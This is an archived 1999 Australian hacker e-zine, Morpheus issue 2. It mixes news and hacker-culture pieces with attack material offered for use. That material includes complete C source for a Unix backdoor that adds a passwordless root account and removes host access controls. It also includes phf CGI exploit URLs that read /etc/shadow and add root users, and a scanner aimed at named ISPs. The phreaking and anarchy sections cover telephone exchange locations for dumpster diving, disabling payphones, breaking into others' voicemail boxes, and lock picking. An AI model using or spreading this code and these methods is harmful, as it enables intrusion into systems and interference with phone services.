💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › MORPHEUS › morp… captured on 2021-12-04 at 18:04:22.
<=-------------------------------------------------------------------------=> ,%$+: =++%- -+- .+##@ H##H, ;@#= H##- ,##@. ,H#= ISSUE02 JUNE1999 X##/ ;##H +#= X@#H $H#H /#= X+##, H+#H ., ,- /#= . H=##; -%/#@. ./%%= ++:+,:H%:%%; /#=-+%= =%%: -;:. ,;;- -%%+- @,H#X /;;#M. XH=%M- /M$@#%M#M@M#M: /#+H@#@, =@/%M: =HM= =X#+ .H+:M$ @,/##. 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I recieved lots of praise from the first issue, so i hope the second and following do the same :) Many people have asked me about the different versions that i mentioned in the first issue, but i have decided just to do one full issue, and release to the masses whatever i want. Although a number of people have told me that FAST no longer works from a payfone.. i hope this is not due to Morpheus, and if it happens again, such information wont be released.. sorry. Morpheus will not be released on a set date, it will be released when I receive enough info to compile another issue. If u have something u would like printed please send it in.. or if i have contained something in a previous issue that u feel u should have credit for, or dont like, please!! let me know and i will make the due alterations. Enjoy the rest of the e-zine. - Phrost Byte 1.2 - About ALOC / Morpheus ALOC started off as a group, but it didnt work out. So i went back to my original idea.. and that was to create a place where australian hackers and phreakers could meet together, trade information, and learn. So that is what ALOC has become, a place to get information and talk to others of similar interests. In general it has become a Network. Morpheus is part of the above, and it compiles alot of what would be little texts into one large one, which would otherwise be quite time consuming to write seperate small files on. This magazine in its electronic form can not be sold without prior permission from the authors. It also may not be spread via any sort of Public Domain, Shareware or CD-ROM package. 1.3 Contibutors To This E-zine Phrost Byte - phrost_byte@hotmail.com (me of cource!) Phrostess - not a cyberpunk, so correspondence would be futile. Deicidal - deicidal_@hotmail.com f0z - f0z1@hotmail.com iMoRtAl - imortal@mailandnews.com <=-------------------------------------------------------------------------=> 2.0 -[ News ]- -------------- 2.1 - ASIO Gain More Power The Australian Government, being the techno-brainless institution that it is, is trying to push a bill through parliament that will allow ASIO (Australian Security Intelligence Organisation) to have greater power in the areas of intelligence gathering in Australia. This will include greater freedom to hack into private computers, copy files and alter data as well being able to legally place tracking devices on peoples and private property. It is proposed that the new bill will be for "Better security leading up to the Sydney 2000 Olympics" but we all know that once the Olympics are gone, the bill will still be here to stay. The Federal Attorney-General, Daryl Williams, stated that the bill will permit security officers to hack into a computer if "there are reasonable grounds for believing that access to data held in a particular computer (the target computer) will substantially assist the collection of intelligence that is important in relation to security." The bill allows ASIO to employ intelligence-gathering methods not previously allowed under the Australian Security Intelligence Act, 1979. This includes extending the period that a warrant applies for, now up to six months. It also allows ASIO to use tracking devices, not specified by Mr. Williams (wonder why!), as well as giving it powers to enter property, and alter objects to install tracking devices. The bill also allows ASIO to enter a property to remove devices, while the warrant is in force, during a 28-day period after the warrant is enforced and if the device is not recovered during that period, or in Mr. William's words, "at the earliest possible time". An access warrant will permit ASIO to use computers, phone companies and telecommunications equipment to gain access to a remote or networked computer. Once in, the ASIO hackers will be allowed to copy, add, delete or alter any data in the target computer that is relevant to the security matter. When they leave security officers will be allowed to cover up the fact that they hacked into the system and will not be subject to the Crimes Act, which forbids computer hacking in Australia. Other powers include the authority to examine an article being delivered by a delivery service provider, to conduct investigations for the collection of foreign intelligence in Australia, including the use of human agents. "Access to open source material, e.g. Internet and media, may also be used to supplement other material," talking about online monitoring, search engine use and filters. ASIO was established in 1949 to protect the Commonwealth from acts of sabotage from internal or external threats but as the clock ticks over towards 2000 it looks to be lagging behind in its primary job and although measures are being taken now to secure Australia for the coming of the Olympics, it looks just like a disguised version of Big Brother, attempting to keep a watchful eye on the Australian cybercommunity. <=-------------------------------------------------------------------------=> 3.0 -[ Hacking ]- ------------------ 3.1 - Hacker Types Most e-zine / sites have a list of the different types of hacker out there, so here is mine. This is not the definative list, or the be all and end all list. These are just my opinions / views, and they will all be read, and thought about differently by each person, since everyone has their own meaning for what a 'hacker' really is. Alot of them overlap.. and it just makes for interesting reading... if anything? Which one are u? Lamer: general colective term for the-i-saw-hacker-the-movie-and-wanna-be- one-too, the-script-kiddie, the-so-called-1337-hacker, and any others that fit. The-i-saw-hackers-the-movie-and-wanna-be-one-too: 7h3y 741k l1k3 7h15 (they talk like this) .. or LiKe ThiZ.. since thats how they typed in the movie. All they do / wanna know is how to nuke their friends, flood channels, email bomb, hack such and such's home page, and take over IRC chans. The-script-kiddie: they are above the so-called-1337-hacker, because they can actually root boxes, even though they have no idea what they are doing. They just run exploits against box after box, and are usually after warez, or credit cards. They have a large collection of exploits, and programs with BIG, BEAUTIFUL!! shiny Buttons!!! The-so-called-1337-hacker: these types go around bragging to every1 how 'leet' they think they are, and think that they can root every box they come across. They bag other hackers non-stop due to their jealousy, since they know in actual fact that they couldnt hack a DOS box even if they had physical access it it! And when posed with a question, they bullshit around the answer, since they dont know it, but they want u to think that they do. Hacker-with-a-life-albeit-computer-orientated: these hackers are people that usually have girlfriends, and actually 'get out' into the real world once in awhile, be it for a new music cd, comic, some new clothes, or more than likely computer hard ware :) Hacker-with-no-life-whatsoever: they spend all night hacking away, sleep during the day (if at all), and get right back to it at night. They are normally in the top classes in school (chem, calc, etc), but due to their hacking.. they dont do too well at school. They never go out, they have never met their friends, and only know them by pseudonyms, and have MAYBE had voice contact if they dabbled in phreaking... The-real-life-hacker: a hacker who hacks things in everyday life. They put the hacker ethics and tactics into play in real/everyday life. For example, they complain how un-efficient the road / traffic light system is. These types are more closely related to the 'old school hacker'. Since that is basically what they are. The-REAL-ELITE-Hacker: they can code very efficiently in a language, they are the ones who come up with / find all these exploits, and they also actually do something for others. They teach. Unlike the so-called-1337 -hacker when posed with a question, they will answer to the best of their ability, and if they cant answer it they will tell you straight out that they dont know the answer, and will point you in the right direction, instead of bullshitting it. Not many.. IF any of these are around. The-Ethical-Hacker: hackers in suits that get paid. 3.2 - Backdoor I found the following backdoor on a site somewhere, and there is no credit to who wrote it, i have modified the orginal, but i wont call it my own (since it is not!). The original only listened on port 550 i think it was.. I modified it so that the user can specify what port to listen on, and the user that is added to the passwd file looks more realistic. And for another option i made it so that you can remove the files /etc/hosts.allow and /etc/hosts.deny so you can telnet in without having to go through wingates, or other means. After modifing the backdoor i found, i noticed that Keen Veracity had already published one which does basically the same thing. (Issue 1, www.legions.org, by jsbach). But the version i had was a lot cleaner.. so here it is: //------------------------------------------------------------------------- // Usage (setup): // # gcc -o backdoor backdoor.c // # ./backdoor <password> <port> & // Usage (using): // telnet to the host (with the port you specified), type the password // (there is no prompt, therefore its less obvious as a backdoor), // and select an option. // // Note: dont use backdoor as the name to compile it to, since if a // process listing is performed.. a process called backdoor looks abit // suss, or if you know how, modify ps, so it doesnt show up backdoor :) // // Option 1: adds the user "smithr::0:0:Robert Smith:/root:/bin/bash" // Option 2: copies /etc/hosts.allow to /etc/hostsallow.bak and // /etc/hosts.deny to /etc/hostsdeny.bak, and touches replaces, // so u can telnet in.. //------------------------------------------------------------------------- #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/wait.h> #define MAXDATASIZE 100 #define BACKLOG 10 void handle(char *command); int main(int argc, char *argv[]) { int sockfd, new_fd, sin_size, numbytes; char *bytes; struct sockaddr_in my_addr; struct sockaddr_in their_addr; char buf[MAXDATASIZE]; char ask[]="Enter Command:\n1. Add new user (Robert Smith) to /etc/passwd.\n2. Remove hosts.allow and hosts.deny\n:"; if (argc != 3) { fprintf(stderr,"Usage: %s <password> <port>\n", argv[0]); exit(1); } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1); } my_addr.sin_family = AF_INET; my_addr.sin_port = htons(atoi(argv[2])); my_addr.sin_addr.s_addr = INADDR_ANY; if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) { perror("bind"); exit(1); } if (listen(sockfd, BACKLOG) == -1) { perror("listen"); exit(1); } while(1) { /* main accept() loop */ sin_size = sizeof(struct sockaddr_in); if ((new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) { perror("accept"); continue; } inet_ntoa(their_addr.sin_addr); if (!fork()) { recv(new_fd, buf, MAXDATASIZE, 0); bytes = strstr(buf, argv[1]); if (bytes != NULL) { send(new_fd, ask, sizeof(ask), 0); numbytes=recv(new_fd, buf, MAXDATASIZE, 0); buf[numbytes] = '\0'; handle(buf); } close(new_fd); exit(0); } close(new_fd); while(waitpid(-1,NULL,WNOHANG) > 0); } } void handle(char *command) { FILE *fle; if(strstr(command, "1") != NULL) { fle = fopen("/etc/passwd", "a+"); fprintf(fle, "smithr::0:0:Robert Smith:/root:/bin/bash"); fclose(fle); } if(strstr(command, "2") != NULL) { system("mv /etc/hosts.allow /etc/hostsallow.bak"); system("mv /etc/hosts.deny /etc/hostsdeny.bak"); system("touch /etc/hosts.allow /etc/hosts.deny"); } } 3.3 - CGI Exploits ---------------------- Each issue I hope to have a new CGI exploit for you, these can still be found on many servers, and most particularily ones that run older versions of Apache, with the demo CGI scripts installed. CGI - Common Gateway Interface. Using CGI extends the capabilities of a server to interpret information from the browser and return information based on user input. One of the easiest ways to to break into a machine through a CGI program is to try and confuse it by experimenting with the input. If the CGI is not robust, it will either crash or do something it was not designed to.. Phf --- This is a very old exploit, but Phrost and I have managed to find some ISP's that still have not fixed this gaping hole. So we have started off with this one, and it is also very simple to implement. The following is only an introduction (hence to push you in the right direction), there are many files out there that delve into phf alot deeper, find them yourself, the following gives you enough information to understand why phf is exploitable, and how to do it. Phf is originally designed to update a phonebook style listing of people. As mentioned above, CGI scripts can behave differently by 'confusing' them, and phf is easily 'confused' by sending it the newline (0a) character. Phf is located in the WWW cgi-bin directory. If it is there, and has permission x, you can use any web browser to read files on the host's computer, and save them to your own. Depending on what the httpd server is running as, depends on what you can do with phf, eg if it was running as root, you can add new users, etc. Firstly you must find a site that still has phf installed on their system. Unless you want to be typing address's into your browser all your life, Phrost has taken the liberty of writting a phf scanner in REBOL for you all (see Appendix I). The above mentioned scanner will be updated and improved with each issue. Once you have found a machine that looks like it may be vulnerable, the next move is to check to see if phf is still active. Do this by checking to see what user it is running under, by typing the following URL into your browser: http://www.victim.com.au/cgi-bin/phf/?Qalias=x%0aid It should return something similar to: QUERY RESULTS /usr/local/bin/ph -m alias=x id uid=65534(nobody) gid=65535(nogroup) groups=65535(nogroup) This shows that httpd is running as nobody.. If you find one that is running as root, you can perform such functions as: Display the /etc/shadow file (shadow file may be a different name): http://www.victim.com.au/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow Add a root user: http://www.victim.com.au/cgi-bin/phf?Qalias=x%0a/bin/adduser%20username%20 username%20100%20 http://www.victim.com.au/cgi-bin/phf?Qalias=x%0a/bin/chuid%20username%0 http://www.victim.com.au/cgi-bin/phf?Qalias=x%0a/bin/chuid%20root%500 Even if you dont get root access, make sure you still have a look around the system.. Once Phrost and I found an ISP that kept their passwords well shadowed except that they kept another copy in a file called auth_users with both usernames and passwords together, and was world readable! Be warned though, many ISP's do know about this exploit and have taken measures to record foreign IP's that attempt to exploit them (and usually display a message such as 'Smile you're on camera') For many of us this doesnt matter too much but i thought i would warn you anyway so that when your ISP gets mail from one of your attempted tagets... dont blame me. <=-------------------------------------------------------------------------=> 4.0 -[ Phreaking ]- ------------------- 4.1 - Exchange Locations (Western Australia) The following are a list of exchange locations and descriptions for Western Australia. Unfortunately i havent had any submitted for the other states. This information is very handy to phreaks.. Telstra can't exactly move the exchange, like they can change the numbers we get a hold of :) The follwing were submitted by Optix: Wellington Exchange - 639 Wellington Street, Perth - 2 Dumpsters at end of Main driveway just under security camera - building is approximately 16-20 storeys high Pier Exchange - 98 Pier Street, Perth - 1 Wheelie Bin spotted. 1 (possibly 2/3) dumpsters spotted behind corrugated steel gate (easy to jump) - approximately 7 stories high. Right next to Red CAT stop #1 Kelmscott Exchange - Albany Highway, Kelmscott - 1 wheelie bin outside back enterance. 1 LOCKED Dumpster behind exchange (off property) - lock for dumpster is around about a 40mm - 60mm padlock, you could get through it with an average size pair of bolt cutters. Also what looks like a big power generator (on property) to the side of the building (about the size of a cargo container). Easy access at the rear of the building, it's a carpark for Kelmscott Railway Station. You could park right next to the dumpster and in front of the wheelie bin. The follwing were submitted by Bad Vibez: Carey Street (Near Catholic School) - a couple of dumpsters, i think, towards the back - there's an empty field backing it, you can't get to it from the highway though, and perhaps if you convinently dropped a footy into the dumpster from that side, then walked around the front, talked to the gatehouse guy, told him that you were getting your footy, you could dumpster the joint. The following were submitted by iMoRtAl Exchange Phone Number Address Applecross 101 Adross St (cnr Macrae) Armadale 9497 1199 Jull St (Next to post office) Ascot 9361 1650 Hardley Rd, Belmont Ashfield 9279 5863 Wesfarmers, Railway PDE Attadale 9330 1111 cnr Curtis & Holme Rd, Melville Baldivis 9524 1049 Baldivis Rd (south of Fay Rd) Ballajurra 9249 5099 Illawarra Cres Bassendean 9377 3699 Wilson Street Bateman 9332 1199 Hassel Cres (off Leichhardt St), Bullcreek Beckenham (L/Y) 9451 1200 Beechboro 9377 4090 cnr Amazon Drive & Sacramento Ave Belhus 9297 3999 Chateau Place, (Before security gate) Bentley office Ewing St (Near Sevenoaks Street) Bullsbrook 9571 1352 Bullsbrook Road Bulwer 9491 7455 Burns Beach 9305 5999 Marmion Ave (1km past Burns Beach Road, on left) Byford 9525 1099 cnr Blytheswood & South Western Hwy Carmel 9293 5211 Carmel Road near cnr of Ash Street Carrabooda RCM Karoborup Rd, 1.1km off Wanneroo Road Carramar Pk RCM cnr Wanneroo Rd & Carramar Rd Cannington 9350 6373 cnr Wharf St & Albany Hwy Canning Vale 9455 1199 Amherst Rd (near Nicholson Ct) Caversham RAAF 9571 7631 Harrow Street Chidlow 9572 4099 Thomas St, near Rosedale Rd Chittering Downs 9571 1199 Meadowbrook Ramble City Beach 9385 7999 cnr Templetonia Cr and Kingsland Ave Cottesloe 9385 3999 cnr Stirling Hwy and Congdon St Currumbine 9305 3999 cnr Marmion Ave and Moore Drive (on right) Darlington 9299 6799 cnr Montrose Ave & Darlington Rd Doubleview 9445 1090 Scarborough Beach Road (cnr Hutriss Rd) Flynn Drive RCM off Flynn Dr, on Mather Passed Avery St Forrestdale 9397 0111 Hale Road near Hanover St Fremantle 9335 1201 Short St (near Market St) Gidgegannup 9574 6099 Reserve Road Gidgegannup Springs cnr McKnoe Drive & Charcole Rd Girrawheen 9247 1094 Girrawheen Ave, near Hudson Ave Glenroyd 9574 4099 cnr Berry & Reserve Road Gidgegannup Glen Forrest cnr Hardey Rd & Railway Parade Gnangara R42 Site, off Wetherell Rd (pine plantation) Gosnells 9398 2200 cnr Dorothy & Hicks St Greenmount 9294 1090 Innamincka Rd, (near round-about) Hamersley 9447 7123 cnr Beach Rd and Okley Rd, Carine Hepburn Hts RIM off Walter Dr, Padbury Blvd (r) Blackwattle Herne Hill 9296 1100 Gt Northern Hwy, near McDonald St Hilton 9314 2202 cnr South & Chamberlain St Hutingdale 9490 5199 Balfour St, (between Holmes and Bullfinch) Jandakot 9414 5001 cnr Forrest Rd & Elderberry, South Lake Joondalup 9300 2999 Winton Ave, Joondalup CBD Kalamunda (L/Y) 9291 7422 Railway Rd, (opposite Kalamunda Hotel) Kelmscott Albany Hwy (near Railway Stn) Kewdale 9353 1457 Miles Rd (near Stores) Kingsley 9309 2999 Ardrossan Loop (opposite no. 36) Lansdale 9302 1999 cnr Mosey St and Rogers Way Lesmurdie 9291 6234 Rooth Rd (near Lesmurdie Rd) Maddington 9493 3555 cnr of Attfield and Herbert Maida Vale Kalamunda Rd (near Hawtin Rd) Malaga (L/Y) 9249 1717 Westchester Rd Manning 9313 1199 cnr Ley St & Manning Rd Maringinup RCM off Pingar Rd right on Neaves Maylands 9272 1235 cnr Guildford Rd & Penninsula Ave Maylands Police Acad. Bank Rd MDLD V101-102 cnr Dalgety & Swan St, Middle Swan MDLD V103-104 cnr Marshall Rd & Dulwich St MDLD V105-107 cnr Marshall Rd & Arthur St Medina 9493 2924 4 Calista Ave (near Summerton Rd), Calista Menora (behind Inglewood pool) Alexander Drv Midland 9250 1999 cnr Morrison Rd & New Bond St Midland (L/Y) 9274 3666 cnr Elgee St & Freguson St Mindarie 9407 7999 Rothesay Hts (of Anchorage Dr) Mt Hawthorn 9443 1099 cnr Scarborough Beach Rd and Oxford St Mt Helena 9295 1120 cnr Evans & Marquis St Morley 9276 1094 (near Marlows) Russel St Mt Yokine 9481 0717 (radio site) 1 Osborne Rd Mullaloo 9401 1094 cnr Coral St and Marmoin Ave, Craigie Mundaring 9295 1090 Gt Eastern Hwy (next to Police) Mundijong Jarrahdale Rd ( near South West Hwy) Nedlands 9386 1020 cnr Stanley St and Elizabeth St Neerabup 9407 5099 cnr Wanneroo Rd & Gibbs Rd Ocean Reef 9300 4999 cnr Santiago Pwy and Baroola Pl O'Connor (L/Y) 9337 5444 Optus Lockridge 9378 1266 (Telecom switch room) Altone Rd, Kiara Osborne Park 9244 3900 12 Carbom Crt (Unit 6) Parkerville 9295 4200 Owen Rd near Byfield Rd Palmyra 9319 1883 Canning Hwy (near Petra St) Pearce RAAF 9571 1232 (RAAF PABX room) Gt Northern Hwy, Bullsbar Perth North 9240 1090 (off lunchroom) 1 Bendsten Pl Pickering Brook 9293 1136 Pickering Brook Rd (opposite primary) Pier 9221 4187 Quinns Rock 9305 1999 about 70 Quinns Rd (top of hill) Riverton 9354 1514 cnr Corinthian & Modillion Rd Rockingham 9527 8100 / 9592 Simpson Ave (near Read St) 1399 Roleystone 9397 5200 Holden Rd Rockingham (L/Y) 9592 2444 Rottnest 9292 5000 Cristie Dv, Rottenst Rolling Green 9574 7122 Green Pl Sawyers Valley (microwave tower site) 1.2km east of town Scarborough 9245 1090 10 Stanley St Secret Harbour 018 946 489 Seacrest Rim (hut in backyard) Harman Rd cnr Seacrest Dr South Coogee 9437 1178 Rockingham Rd (near Dalison Ave) South Perth Angelo St (near Coode St) Spearwood 9434 2163 Mell Rd (off Rigby St) Straton 9250 7999 Farral Rd Subiaco 9381 5999 cnr Park St & Rockeby Rd (behind P.O.) The Lakes 9572 6019 Gt Eastern Hwy Tuart Hill 9344 1212 cnr Wanneroo Rd &Myinbar Way Two Rocks 9561 5999 Lisford Ave (before Soverign Ave) Victoria Park 9361 7222 cnr Teague St & Axon St Vines (PABX room) The VInes Resort Hotel Wanneroo 9306 3999 916 Wanneroo Rd Warnbro 9593 1384 / 9593 Holcombe Rd (near Warnbro South Rd) 2900 Wellington 9481 0099 2nd floor, 639 Wellington St Wembly 9383 7999 cnr Marlow St & Bournville St Wundowie 9573 6299 Boronia Ave (near fire station) Wooroloo 9573 1299 Linley Valley Rd Yanchep 9561 1099 Glenrothes Cr (oppos fire station) 4.2 - Telstra Employee Levels I have written the following based on a variety of sources. Telecommunications Officer (previously known as Linesperson) They install and maintain external telecommuncations equipment (including aerial lines, conduits and cables) and telephone customers' premises. These are the people who drive arround in the Telstra cars, vans, and wagons. Telstra also hire telecommunications offers on contract from other companies, you may have seen unmarked white (always white) cars parked near pods, payfones, etc. So when you start noticing lots of Telstra vans, remember there are also unmarked white wagons that also contain Telstra related equipment ;) The majority of telecommunications officers work for Telstra and are classified as communication officers grades 1 to 6, according to the duties they perform. (The higher the number, the more access they have to Telstra equipment and facilities.. eg if you have a set of keys that have exchange keys on them.. you more than likely stole them from a high ranking telecommunication officer, or even a telecommunication technician.. see further below). Grades 1 to 3 may perform the following tasks: - help to install transmission lines and equipment at heights on towers - operate excavation machinery to provide trenches and install conduits - lay and joint underground (metallic and fibre optic) cables for the transmission of telephone, television, radio, and computer data, which involves work in underground tunnels - connect cables in the network between exchanges and customer's premises - install telephones and communications equipment (simplex services) at customers' premises - provision of support for LAN (Local Area Network) systems including the establishment, configuration, use, troubleshooting and support for such systems - travel by mobile unit to attend to telecommunication difficulties and customer complaints, and - correct faulty, unearthed or broken lines which may be caused by lightning, or damaged by accident or fire. (ED - and phreaks!) Grades 4 to 6 with Telstra are mainly supervisory and training positions and may perform the following additional tasks: - supervise and develop training programs for communications officers at lower levels, and - operate computer systems which record and store data on maintenance and repair of equipment and plant. Telecommunications Technician They install, operate, maintain ans repair telecommunications and broadcasting networks and equipment. Most technicians work for Telstra, but as mentioned above, Telstra also hire technicians on contract. Telstra technicians are known as telecommunications technical officers (TTO). TTO's work both indoors and outdoors, and have considerable contact with customers in business or private homes. They may work in telephone exchanges, computer and equipment rooms, installation or service depots for sustained periods of time. TTO's are ranked from grades 1 to 7, according to the duties they perform. Telecommunications technicians may perform the following taks: - commission and accept network equipment and the provision of new services - ensure the integrity and quality of equipment and circuit installations - position and terminate cables, install jumpers, wires, and strappings - undertake proof tests such as wire testing, analogue circuit commissioning and power tests - assemble, erect, position and label all items of equipment - sell telecommunications products - provide estimates to customers for installation of equipment - install and maintain telephones, PABX and other business communication systems (complex services) at customers' premises - install, test and carry out restorativeand routine maintenance on all types of telecommunications, switching and transmission equipment, including telephone exchanges and the public telephone network. - carry out, under supervision, modifications to items of equipment - analyse system faults with a high degree of diagnostic skill - maintain and adhere to operational procedures and complete appropriate documentation - assume responsibility for assigned tools, plant and test equipment (ED - LMAO!!!) - develop and maintain good relations with internal and external customers, and - operate call tracing facilities when necessary (ED - argh!) 4.3 - Putting A Payfone Out of Order I know alot of people once knowing that how to put a payfone out order was going to be in Morpheus 2, have sent me an email telling me how to do it, but since my girlfriend was the first to teach me how to do it, here is her article.. enjoy! Ok...so you want to put a payphone out of order but Phrost and Deicidal won't lend you their precious keys. (hey who needs keys if you're a REAL phreaker, right?) To put a X2 payphone (thats what Phrost tells me it is, to me its just another fucking phone, no different from the last or the next...) out of order you will require: bolt cutters, a soldering iron, gloves, suphuric acid, and lots of brute strength. WRONG! All you need is the little <OK> button and the handset itself! Hold down the <OK> button and THEN pick up the handset for just a matter of moments - perhaps 3 seconds if that, just until the phone registers - never releasing the <OK> button. Then hang up the phone, and MON DIEU! The phone is now out of order! And now that I've had this contribution to the cyber-technology-FUTURE age forced out of me, I'm going to dive straight back into the Russian Revolution and immerse myself in HISTORY... � bient�t! Phrostess; aka NOT a phreaker-hacker-coder-cyberpunk-whatever. 4.4 - Free Optus Voicemail! f0z VMB (03) 9220 9828 f0z1@hotmail.com Looking for a free optus voicemail box? The exchange here in Melbourne is (03) 9220 XXXX. It might be different in other states. Just look in the back of the L-Z white pages for the exchange page and dial a few optus ones till you start getting VMB's. Just call up one and if you get a recoring of the optus lady saying leave a message after the beep press * It will ask you for the passcode and the passcode is the number that you just dialed. i.e box: 9220 3243 passcode: 9220 3242 If it doesn't work then try it without the 9 at the start. If you call up and get some other guys box then press * twice to get to the login menu. From there dial any number you wish in the 9220XXXX exchange. You can spend all night scanning on the one phone call. Also, some numbers in the 9221xxxx exchange are fax boxes. Dial a few numbers there until you get a message saying some crap about faxes and use the same number/passcode combo as above. There ya go Have fun <=-------------------------------------------------------------------------=> 5.0 -[ Anarchy ]- ----------------- 5.1 - Lock Picking The following was taken basically word for word (except the introduction, and other comments) from 'Secrets of Lock Picking' by Steven Hampton. For more detailed explanations see the web site section further below. Introduction - lock picking can be a VERY useful skill to know, especially for a phreak that can't get their hands on that ellusive set of keys. I will only delve into the pin tumbler type lock, since these are the most common. After reading this text, you should be into lockers, pod's, exchanges, and various other places that u are not supposed to be. By using the following technique, Deicidal and I were into all types of padlocks, pods, lockers, exchanges, and through glass sliding doors... Have phun ;) How a lock works - as i said before, the most commonly used lock today is the pin tumbler. A series of pins that are divided at certain point must be raised to these dividing point in relationship to the separation between the cylinder wall and the shell of the lock by a key cut for that particular series of pin divisions. Thus the cylinder can be turned, and the mechanism can be locked or unlocked. (see images m2lkpk1.gif and m2lkpk2.gif) Picking - by picking a lock, you simply replace the function of a key with a pick that raises the pins to their 'breaking point', and using a tension wrench you rotate the cylinder to operate the cam at the rear of the lock's cylinder to unlock the mechanism. Tools - All that is required is a small flathead screwdriver, and a safety pin that is used like a 'hook' pick. The last half inch of the screwdriver is bent at a 45 degree angle so as to allow easy entry for the saftey pin pick. I recommend buying a 12 piece pick set if you are serious about lock picking, it makes it a HELL of alot easier (see web sites listed below). How to pick a pin tumbler lock - Without using the tension wrench, slip the pick into the lock. The 'hook' of the pick should be towards the tumblers. Try to feel the last tumbler of the lock. When you feel the back tumbler, slowly raise it with a slight prying motion of the pick. Release it, but keep the pick in the lock on the rear tumbler. Now insert the wrench, allowing room for the pick to manipulate all the pins. It should be placed at the bottom of the cylinder, apply a gentle clockwise pressure to the tension wrench (see images m2lkpk_1.gif and m2lkpk_2.gif to see what it looks like.. with a real pick set). Slowly raise the back tumbler with the pick, and a minute click will be felt, and heard when it breaks. It will loose its springiness when this occurs. Repeat the process with each pin, moving outwards, and eventually the cylinder should turn (see images m2lkpk3.gif, and m2lkpk4.gif). That is all there is to it! Web Sites - the above is only intended to be an introduction to lock picking, for a more detailed explanation, visit the following sites (the MIT guide is one of the best): http://home.it.net.au/~hardguy/text/mitguide.pik - the famed MIT guide to lock picking!! http://www.lock-picks.com/ - dedicated to just lock picking not like the one below http://www.lockpicking.com/ - contains lots of 'spy' stuff http://stronghold.netnation.com/~eclect/locksmith/ - a 'locksmithing' (same as picking) cource http://www.networkx.net/~spook/lockpick.html - various books on lock picking 5.2 Free Fast Food ------------------ You one of those poor bastards that can't afford to buy a whole meal at kfc, HJ's or the like?? and just go for a large chips?? Well heres how u can get more of those greasy, krusty chips! I've only done this once at KFC, and I've made a scene b4 at MacDonalds, and gotten a whole meal for free (trust me, its not worth the embarassment.. but hey.. if i'm a bum, i know how to get food!, if u can call it food?) What you do, is order a large chips.. got outside, eat half of them.. then go back into the store and say something to the effect of 'These chips are too salty, and i cant eat them, theyre sickening' the dumb fast food girl will probably go and ask the manager what to do.. so u wait.. and they'll come back and give u a whole new pack, and ask u if u want salt on them this time. (i said yeah, just a LITTLE bit.. and the bitch put a heap on again!). There u are.. one and a half large chips, for the cost of one :P Dont eat em all at once!!! PS - always ask for NO ICE !!! <=-------------------------------------------------------------------------=> 6.0 -[ Challenge ]- ------------------- 6.1 - JavaScript Password Box As i mentioned in the first issue there will be a challenge for you to try before the next one comes out. This first one is a JavaScript Password scheme which I found at fravia's (http://fravia.org, or try http://www.phase-one.com.au/fravia/). To get to this challenge, click on the Cat In The Hat on the page (www.aloc.cc), if you can crack it, you will be rewarded with the phone numbers from the payfone log books (Sorry to all the phreaks who dont crack.. but this is the only way i can release them without them being abused... it makes people actually do something to get them). If you manage to crack it, please email me a message saying you cracked it with the numbers from the page (for proof), and if you don't crack it, also send me an email describing the process you used, and how far you got. If i get alot of email from people who can't crack it, I will provide hints, and help based on their email in the next issue.. Good Luck! PS - check out http://fravia.org, or try http://www.phase-one.com.au/fravia/ for a headstart ;) <=-------------------------------------------------------------------------=> 7.0 -[ Conclusion ]- -------------------- That's it for another issue. In the first i mentioned that there would be some DTMF tunes to play.. well i didnt get any sent in.. and i dont know any.. oh well, u get that. Next issue will have more on Echelon (by Hool), another CGI exploit, an explanation of UNIX text editors (sed, grep, etc), a detailed explanation of REBOL, and various other pieces of information. Hope u enjoyed it, AND learned something... Phrost Byte <=-------------------------------------------------------------------------=> Appendix I ---------- Due to time, I cant explain this script in more detail. But as mentioned above, there will be an article on REBOL in the next issue, and the script will also be modified and improved. For now, visit www.rebol.com to get the program to run this script, and try learning some it yourself. The script works by connecting to the site, and seeing if phf is there. If it is, you get the message Found! if not, it displays Not Found. As mentioned in the phf article, some sites have put the message 'Smile you're on camera' in place of phf, if this is the case, the scanner will still return Found!, you have to go through the list and test the Found! ones by hand, to see if they are in fact vulnerable. To use this script, just paste your list of domains in between 'sites [' and ']' and alter the statement 'for where 1 5 1 [' to reflect the amount of sites in the sites [] list. eg, i have included 5 sites already, if i add another to sites [] , i have to alter 'for where 1 5 1 [' to read 'for where 1 6 1 [' get it? if not, dont bother with it. To run, in REBOL, type: >>do %phfscn.r --- phfscn.r --- cut here --- REBOL [ Title: "phf Scanner" Author: "Phrost Byte" File: %phfscn.r Purpose: {To scan a list of domains for the phf vulnerability.} ] secure none sites: [ www.accessin.com.au/cgi-bin/phf emerald.crystal.com.au/cgi-bin/phf www.dialix.com.au/cgi-bin/phf www.dmn.com.au/cgi-bin/phf www.wanet.com.au/cgi-bin/phf ] for where 1 5 1 [ found: exists? the_url: join http:// [ pick sites where ] prin ["Searching for " pick sites where " : "] if found == yes [ print "Found!"] if found == no [ print "Not Found"] ] print ["Finished searching."] --- phfscn.r --- cut here --- <=-------------------------------------------------------------------------=> Proudly Brought To You By: ,,,,,,,,,,,, =///////////; :/// ,,, :///////////: .///; ://; ////////////= ,///: ;//= ////////////- -///= ///= ............ .=::=, =///- ,=:::- ,=///:-. .--- ,:- ,::- -::= :%;, -;/////, :///, ://////= ;//////, -///,//= =////:///: X####$- :///;////. ;/// =///:;///, ///////. =//;://- -/////////: ;######/ -///- -///: //// .///= .;;;,.;////;: ://////- ;///;;////- $######= ;//; ;//; .///; ,///;=. ;//; ;////;:.,///: .;///- X######- ,////;;;//// ,///: .//////:, ///= ////= :///. :///. +###### = =//////////; -///= :///////= ,///= .///; //// :///. ;###### $X :///=------, =///, -=;/////. -///- ,///- .///: ;/// .#####H X#+ =///, .,,, :///,.,,,. ,;///. =///- -///- ,///; -///: +####$ ###,-///:..:///. ;/// ,///= ;//; =/////. =///. ////::////: .M###+ ###H./////////= .//// .////;;///= =////; :///. ;/////////- /###: =####--///////- .///: =///////= -////; ;//; ,/////-///, .X##HXXXM####X .=;;=-. ... ,=:;==. ,===, .... ,:;=. ... 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